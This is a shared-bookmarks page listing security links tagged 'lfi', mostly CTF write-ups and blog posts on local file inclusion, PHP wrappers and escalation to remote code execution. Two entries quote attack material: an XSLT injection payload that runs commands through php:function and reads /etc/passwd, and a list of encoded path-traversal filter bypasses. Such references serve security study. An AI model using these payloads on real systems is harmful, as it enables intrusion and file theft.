Search: [lfi] - Shared Bookmarks

Links per page: 20 50 100

13 results tagged lfi x

Solving "includer's revenge" from hxp ctf 2021 without controlling any files
September 7, 2022 at 9:09:08 AM UTC - permalink -

- https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d

rce lfi ctf filter php
Oracle WebLogic Server 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 Local File Inclusion
January 25, 2022 at 5:43:19 PM UTC - permalink -

- https://gist.github.com/picar0jsu/f3e32939153e4ced263d3d0c79bd8786

weblogic file inclusion lfi
Local file inclusion with tmp files |
August 19, 2021 at 1:56:54 PM UTC - permalink -

- https://truesecdev.wordpress.com/2016/11/09/local-file-inclusion-with-tmp-files/

lfi tmp files upload php
- LFI With PHPInfo Assistance.pdf
August 19, 2021 at 1:49:00 PM UTC - permalink -

- https://insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf

lfi tmp rce php upload inotifywait inotify
elFinder - A Case Study of Web File Manager Vulnerabilities
August 19, 2021 at 1:47:56 PM UTC - permalink -

- https://blog.sonarsource.com/elfinder-case-study-of-web-file-manager-vulnerabilities

elfinder rce rapid7 lfi wordpress prowebce
Orange: 十月 2018

" OK, by chaining above techniques(session upload progress + race condition + PHP wrappers), we can get the shell back!"
November 10, 2020 at 6:38:26 PM UTC - permalink -

- http://blog.orange.tw/2018/10/

php lfi upload rce sessions
Exploit with PHP Protocols / Wrappers - cdxy
November 10, 2020 at 4:41:29 PM UTC - permalink -

- https://www.cdxy.me/?p=752

php wrapper exploitation filters url include lfi rfi rce

The hidden dangers of XSLTProcessor - Remote XSL injection | Acunetix

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
  <xsl:template match="/">
  <script>confirm("We're good");</script>
   <!--
   <xsl:value-of select="php:function('exec','id')"/>
   <xsl:value-of select="php:function(‘passthru’,’ls -la /’)"/>
   <xsl:copy-of select="document('/etc/passwd')"/>
   <xsl:value-of select="php:function('passthru','ls -la /')"/>
   -->
   <xsl:value-of select="php:function('passthru','ls -la /')"/>

  </xsl:template>
</xsl:stylesheet>

October 16, 2020 at 3:57:50 PM UTC * - permalink -

- https://www.acunetix.com/blog/articles/the-hidden-dangers-of-xsltprocessor-remote-xsl-injection/

xslt injection command execution rce lfi

windowsblindread/windows-files.txt at master · soffensive/windowsblindread · GitHub
April 15, 2020 at 2:40:44 PM UTC - permalink -

- https://github.com/soffensive/windowsblindread/blob/master/windows-files.txt

lfi file read path traversal windows
Upgrade from LFI to RCE via PHP Sessions - RCE Security

RCE through LFI using PHP sessions variables
December 2, 2019 at 3:30:37 PM UTC - permalink -

- https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/

php rce lfi hacking pentest sessions session variable phpsessid
Local File Inclusion · Security - My notepad
June 16, 2019 at 9:48:14 PM UTC - permalink -

- https://xapax.gitbooks.io/security/content/local_file_inclusion.html

lfi cheatsheet
PHP security exploit - list content of remote PHP file? - Stack Overflow
April 1, 2019 at 11:29:13 PM UTC * - permalink -

- https://stackoverflow.com/questions/20726247/php-security-exploit-list-content-of-remote-php-file

php lfi wrapper include data type hacking pentest exploitation
How to Bypassing Filter to Traversal Attacks ? | Hacking & Tricks

dot %2e
forward slash %2f
backslash %5c

dot %u002e
forward slash %u2215
backslash %u2216

....//
....\/
..../\
....\
December 12, 2018 at 11:12:14 PM UTC - permalink -

- https://tipstrickshack.blogspot.com/2013/02/how-to-bypassing-filter-to-traversal_8831.html

bypass transversal filter lfi

Links per page: 20 50 100